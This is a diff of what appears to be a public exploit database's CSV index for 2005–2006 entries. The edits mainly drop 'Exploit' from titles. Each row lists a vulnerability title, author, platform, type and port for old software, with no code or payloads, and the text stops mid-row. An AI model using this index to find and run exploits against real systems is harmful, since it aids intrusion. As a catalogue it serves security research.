+1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String",2005-09-26,c0ntex,linux,remote,0 1233,platforms/multiple/dos/1233.html,"Mozilla Firefox 1.0.7 - Integer Overflow Denial of Service",2005-09-26,"Georgi Guninski",multiple,dos,0 -1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - (search) Remote Format String Exploit",2005-09-26,"Angelo Rosiello",bsd,remote,143 +1234,platforms/bsd/remote/1234.c,"GNU Mailutils imap4d 0.6 (FreeBSD) - 'Search' Remote Format String",2005-09-26,"Angelo Rosiello",bsd,remote,143 1235,platforms/windows/dos/1235.c,"MultiTheftAuto 0.5 patch 1 - Server Crash and MOTD Deletion Exploit",2005-09-26,"Luigi Auriemma",windows,dos,0 -1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution Exploit (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 +1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - (msg_send) SQL Injection",2005-09-28,rgod,php,webapps,0 1238,platforms/linux/remote/1238.c,"Prozilla 1.3.7.4 - (ftpsearch) Results Handling Buffer Overflow",2005-10-02,taviso,linux,remote,8080 1239,platforms/windows/dos/1239.c,"Virtools Web Player 3.0.0.100 - Buffer Overflow Denial of Service",2005-10-02,"Luigi Auriemma",windows,dos,0 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 1241,platforms/php/webapps/1241.php,"Cyphor 0.19 - (board takeover) SQL Injection",2005-10-08,rgod,php,webapps,0 -1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String Exploit",2005-10-10,"Ulf Harnhammar",linux,remote,0 +1242,platforms/linux/remote/1242.pl,"xine-lib 1.1 - (media player library) Remote Format String",2005-10-10,"Ulf Harnhammar",linux,remote,0 1243,platforms/windows/remote/1243.c,"CA iGateway - (debug mode) Remote Buffer Overflow",2005-10-10,egm,windows,remote,5250 -1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal Exploit",2005-10-10,cXIb8O3,php,webapps,0 +1244,platforms/php/webapps/1244.pl,"phpMyAdmin 2.6.4-pl1 - Directory Traversal",2005-10-10,cXIb8O3,php,webapps,0 1245,platforms/php/webapps/1245.php,"versatileBulletinBoard 1.00 RC2 - (board takeover) SQL Injection",2005-10-10,rgod,php,webapps,0 1246,platforms/windows/dos/1246.pl,"RBExplorer 1.0 - (Hijacking Command) Denial of Service",2005-10-11,basher13,windows,dos,0 -1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution Exploit",2005-10-11,RusH,linux,remote,0 +1247,platforms/linux/remote/1247.pl,"phpBB 2.0.13 - (admin_styles.php) Remote Command Execution",2005-10-11,RusH,linux,remote,0 1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0 1250,platforms/php/webapps/1250.php,"w-Agora 4.2.0 - (quicklist.php) Remote Code Execution",2005-10-14,rgod,php,webapps,0 1251,platforms/windows/dos/1251.pl,"TYPSoft FTP Server 1.11 - (RETR) Denial of Service",2005-10-14,wood,windows,dos,0 @@ -1052,23 +1052,23 @@ id,file,description,date,author,platform,type,port 1258,platforms/linux/remote/1258.php,"e107 <= 0.6172 - (resetcore.php) SQL Injection",2005-10-18,rgod,linux,remote,0 1259,platforms/hp-ux/remote/1259.pm,"HP-UX FTP Server - Pre-Authentication Directory Listing Exploit (Metasploit)",2005-10-19,Optyx,hp-ux,remote,0 1260,platforms/windows/remote/1260.pm,"Microsoft IIS - SA WebAgent 5.2/5.3 Redirect Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,80 -1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution Exploit (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 +1261,platforms/hp-ux/remote/1261.pm,"HP-UX 11.11 - lpd Remote Command Execution (Metasploit)",2005-10-19,"H D Moore",hp-ux,remote,515 1262,platforms/windows/remote/1262.pm,"CA Unicenter 3.1 - CAM log_security() Stack Overflow (Metasploit)",2005-10-19,"H D Moore",windows,remote,4105 1263,platforms/multiple/remote/1263.pl,"Veritas NetBackup 6.0 (Linux) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",multiple,remote,13722 1264,platforms/windows/remote/1264.pl,"Veritas NetBackup 6.0 (Windows/x86) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",windows,remote,13722 -1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OS X) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 +1265,platforms/osx/remote/1265.pl,"Veritas NetBackup 6.0 (OSX) - (bpjava-msvc) Remote Exploit",2005-10-20,"Kevin Finisterre",osx,remote,13722 1266,platforms/windows/dos/1266.py,"Ethereal 0.9.1 < 0.10.12 SLIMP3 - Remote Buffer Overflow (PoC)",2005-10-20,Sowhat,windows,dos,0 1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0 1268,platforms/multiple/dos/1268.pl,"Net Portal Dynamic System 5.0 - (Register Users) Denial of Service",2005-10-21,DarkFig,multiple,dos,0 1269,platforms/windows/dos/1269.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (1)",2005-10-21,anonymous,windows,dos,0 -1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution Exploit",2005-10-23,rgod,php,webapps,0 +1270,platforms/php/webapps/1270.php,"PHP-Nuke 7.8 - SQL Injection / Remote Command Execution",2005-10-23,rgod,php,webapps,0 1271,platforms/windows/dos/1271.c,"Microsoft Windows Plug-and-Play - 'Umpnpmgr.dll' Denial of Service (MS05-047) (2)",2005-10-24,"Winny Thomas",windows,dos,0 1272,platforms/linux/remote/1272.c,"Snort 2.4.2 - Back Orifice Parsing Remote Buffer Overflow",2005-10-25,rd,linux,remote,0 1273,platforms/php/webapps/1273.pl,"TClanPortal 1.1.3 - 'id' SQL Injection",2005-10-26,Devil-00,php,webapps,0 1274,platforms/hardware/dos/1274.c,"Hasbani-WindWeb/2.0 - HTTP GET Remote Denial of Service",2005-10-27,Expanders,hardware,dos,0 1276,platforms/windows/dos/1276.html,"Microsoft Internet Explorer 6 - 'mshtmled.dll' Denial of Service",2005-10-28,"Tom Ferris",windows,dos,0 1277,platforms/windows/remote/1277.c,"Mirabilis ICQ 2003a - Buffer Overflow Download Shellcode Exploit",2005-10-29,ATmaCA,windows,remote,0 -1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution Exploit",2005-10-31,RusH,php,webapps,0 +1278,platforms/php/webapps/1278.pl,"Subdreamer 2.2.1 - SQL Injection / Command Execution",2005-10-31,RusH,php,webapps,0 1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0 1280,platforms/php/webapps/1280.pl,"VuBB Forum RC1 - (m) SQL Injection",2005-11-02,Devil-00,php,webapps,0 1281,platforms/windows/dos/1281.c,"Battle Carry .005 Socket Termination - Denial of Service",2005-11-02,"Luigi Auriemma",windows,dos,0 @@ -1079,19 +1079,19 @@ id,file,description,date,author,platform,type,port 1286,platforms/windows/dos/1286.c,"GO-Global Windows Clients 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1287,platforms/windows/dos/1287.c,"GO-Global Windows Server 3.1.0.3270 - Buffer Overflow (PoC)",2005-11-02,"Luigi Auriemma",windows,dos,0 1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0 -1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - (shell inject) Remote Command Execution Exploit",2005-11-03,rgod,php,webapps,0 -1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String Exploit",2005-11-04,"Kevin Finisterre",linux,remote,0 -1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String Exploit",2005-11-04,"Kevin Finisterre",linux,remote,0 -1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution Exploit (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 +1289,platforms/php/webapps/1289.php,"CuteNews 1.4.1 - (shell inject) Remote Command Execution",2005-11-03,rgod,php,webapps,0 +1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 +1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0 +1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21 1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit",2005-11-05,kingcope,linux,remote,21 1296,platforms/php/webapps/1296.txt,"ibProArcade 2.x - module (vBulletin/IPB) SQL Injection",2005-11-06,B~HFH,php,webapps,0 1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0 -1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution Exploit",2005-11-07,rgod,php,webapps,0 +1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0 1299,platforms/linux/local/1299.sh,"Linux chfn (SuSE 9.3 / 10) - Privilege Escalation",2005-11-08,Hunger,linux,local,0 1300,platforms/linux/local/1300.sh,"Operator Shell (osh) 1.7-14 - Privilege Escalation",2005-11-09,"Charles Stevenson",linux,local,0 1310,platforms/linux/local/1310.txt,"Sudo 1.6.8p9 - (SHELLOPTS/PS4 ENV variables) Privilege Escalation",2005-11-09,"Breno Silva Pinto",linux,local,0 -1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure Exploit",2005-11-09,kingcope,bsd,local,0 -1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution Exploit",2005-11-10,rgod,php,webapps,0 +1311,platforms/bsd/local/1311.c,"FreeBSD 4.x / < 5.4 - master.passwd Disclosure",2005-11-09,kingcope,bsd,local,0 +1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps,0 1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0 1314,platforms/linux/remote/1314.rb,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (4)",2005-11-11,xwings,linux,remote,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 @@ -1106,13 +1106,13 @@ id,file,description,date,author,platform,type,port 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 - Search Module SQL Injection",2005-11-16,anonymous,php,webapps,0 1327,platforms/windows/dos/1327.pl,"FTGate4 Groupware Mail Server 4.1 - (imapd) Remote Buffer Overflow (PoC)",2005-11-16,"Luca Ercoli",windows,dos,0 1328,platforms/windows/dos/1328.c,"Microsoft Windows 2000 - UPNP (getdevicelist) Memory Leak Denial of Service",2005-11-16,"Winny Thomas",windows,dos,0 -1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution Exploit",2005-11-17,rgod,php,webapps,0 +1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - 'config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 1330,platforms/windows/remote/1330.c,"freeFTPd 1.0.8 - (USER) Remote Buffer Overflow",2005-11-17,Expanders,windows,remote,21 1331,platforms/multiple/dos/1331.c,"Macromedia Flash Plugin 7.0.19.0 - 'action' Denial of Service",2005-11-18,BassReFLeX,multiple,dos,0 -1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow Exploit (Metasploit)",2005-11-20,y0,windows,remote,143 +1332,platforms/windows/remote/1332.pm,"MailEnable 1.54 Pro - Universal IMAPD W3C Logging Buffer Overflow (Metasploit)",2005-11-20,y0,windows,remote,143 1333,platforms/hardware/remote/1333.pm,"Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)",2005-11-20,"H D Moore",hardware,remote,80 1336,platforms/windows/dos/1336.cpp,"FileZilla Server Terminal 0.9.4d - Buffer Overflow (PoC)",2005-11-21,"Inge Henriksen",windows,dos,0 -1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution Exploit",2005-11-22,rgod,php,webapps,0 +1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0 1338,platforms/hardware/dos/1338.pl,"Cisco PIX - Spoofed TCP SYN Packets Remote Denial of Service",2005-11-23,"Janis Vizulis",hardware,dos,0 1339,platforms/windows/dos/1339.c,"freeFTPd 1.0.10 - (PORT Command) Denial of Service",2005-11-24,"Stefan Lochbihler",windows,dos,0 1340,platforms/php/webapps/1340.php,"eFiction 2.0 - (Fake .gif) Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 @@ -1125,7 +1125,7 @@ id,file,description,date,author,platform,type,port 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Pre-Authentication Remote Stack Overflow (PoC)",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 -1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String Exploit",2005-12-03,"Kevin Finisterre",linux,remote,0 +1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth - syslog() Remote Format String",2005-12-03,"Kevin Finisterre",linux,remote,0 1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 1357,platforms/windows/remote/1357.diff,"WIDCOMM Bluetooth Software < 3.0 - Remote Buffer Overflow",2005-12-04,"Kevin Finisterre",windows,remote,0 1358,platforms/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 @@ -1153,7 +1153,7 @@ id,file,description,date,author,platform,type,port 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary Attack Tool (2)",2006-02-20,DarkFig,php,webapps,0 -1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Remote Cross-Site Scripting Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 +1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Remote Cross-Site Scripting Cookie Disclosure",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - (rating) Parameter SQL Injection",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 @@ -1164,14 +1164,14 @@ id,file,description,date,author,platform,type,port 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel 2.6.9 / 2.6.11 (RHEL4) - 'k-rad3.c' (CPL 0) Privilege Escalation",2005-12-30,alert7,linux,local,0 -1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 -1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / 3.06 - Login Bypass SQL Injections",2005-12-30,DevilBox,asp,webapps,0 -1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution Exploit",2006-01-01,cijfer,php,webapps,0 -1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution Exploit",2006-01-03,cijfer,php,webapps,0 +1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,php,webapps,0 +1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0 / 3.06 - Login Bypass (SQL Injection)",2005-12-30,DevilBox,asp,webapps,0 +1400,platforms/php/webapps/1400.pl,"CuteNews 1.4.1 - (categories.mdu) Remote Command Execution",2006-01-01,cijfer,php,webapps,0 +1401,platforms/php/webapps/1401.pl,"Valdersoft Shopping Cart 3.0 - Remote Command Execution",2006-01-03,cijfer,php,webapps,0 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0 -1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution Exploit",2006-01-04,cijfer,php,webapps,0 +1405,platforms/php/webapps/1405.pl,"FlatCMS 1.01 - (file_editor.php) Remote Command Execution",2006-01-04,cijfer,php,webapps,0 1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0 1407,platforms/windows/local/1407.c,"Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0 1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80 @@ -1187,12 +1187,12 @@ id,file,description,date,author,platform,type,port 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - (news.asp hid) SQL Injection",2006-01-14,DetMyl,asp,webapps,0 1420,platforms/windows/remote/1420.c,"Microsoft Windows - Metafile (.WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 -1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 +1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 - Volume Manager Daemon Remote Buffer Overflow",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - (GET Request) Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 1425,platforms/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,linux,local,0 -1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 +1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0 1445,platforms/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",linux,local,0 1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service",2006-01-25,Pasv,hardware,dos,0 @@ -1201,10 +1201,10 @@ id,file,description,date,author,platform,type,port 1452,platforms/windows/remote/1452.pm,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (Metasploit)",2006-01-25,redsand,windows,remote,21 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - (par) SQL Injection",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g - (XML) Buffer Overflow",2006-01-26,Argeniss,windows,local,0 -1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 -1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 +1456,platforms/linux/remote/1456.c,"SHOUTcast 1.9.4 - File Request Format String (Leaked)",2006-01-28,crash-x,linux,remote,8000 +1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0 1458,platforms/windows/remote/1458.cpp,"Winamp 5.12 - '.pls' Remote Buffer Overflow (1)",2006-01-29,ATmaCA,windows,remote,0 -1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 +1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1460,platforms/windows/remote/1460.pm,"Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)",2006-01-31,"H D Moore",windows,remote,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 1462,platforms/windows/remote/1462.cpp,"Sami FTP Server 2.0.1 - Remote Buffer Overflow (cpp)",2006-01-31,HolyGhost,windows,remote,21 @@ -1216,21 +1216,21 @@ id,file,description,date,author,platform,type,port 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 1470,platforms/windows/local/1470.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (1)",2006-02-06,bratax,windows,local,0 -1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution Exploit",2006-02-06,Hessam-x,cgi,webapps,0 +1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - (Authentication Bypass) SQL Injection",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 (Linux) - location.QueryInterface() Code Execution (Metasploit)",2006-02-07,"H D Moore",linux,remote,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - (urlmon.dll) Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 - (phfont) Race Condition Privilege Escalation",2006-02-08,kokanin,qnx,local,0 -1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - (OS X) location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 -1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash Exploit",2006-02-08,kokanin,qnx,local,0 +1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - (OSX) location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0 +1481,platforms/qnx/local/1481.sh,"QNX RTOS 6.3.0 - Insecure rc.local Permissions Plus System Crash",2006-02-08,kokanin,qnx,local,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1483,platforms/multiple/dos/1483.pl,"Half-Life CSTRIKE Server 1.6 (Non Steam) - Denial of Service",2006-02-11,Firestorm,multiple,dos,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 <= 2.2 - (FileManager connector.php) Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - (class.forumposts.php) Arbitrary Remote File Inclusion",2006-02-09,rgod,php,webapps,0 -1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,532 -1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String Exploit",2006-02-10,"Gotfault Security",linux,remote,1589 +1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532 +1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589 1488,platforms/windows/dos/1488.txt,"Microsoft HTML Help Workshop - '.hhp' Denial of Service",2006-02-10,darkeagle,windows,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop - '.hhp' Buffer Overflow (2)",2006-02-11,k3xji,windows,local,0 @@ -1245,27 +1245,27 @@ id,file,description,date,author,platform,type,port 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 -1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution Exploit",2006-02-16,cijfer,php,webapps,0 +1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0 -1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution Exploit",2006-02-17,RusH,cgi,webapps,0 +1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - (rollid) SQL Injection",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 -1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (x-forwarded-for) Remote Command Execution Exploit",2006-02-19,rgod,php,webapps,0 +1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - (x-forwarded-for) Remote Command 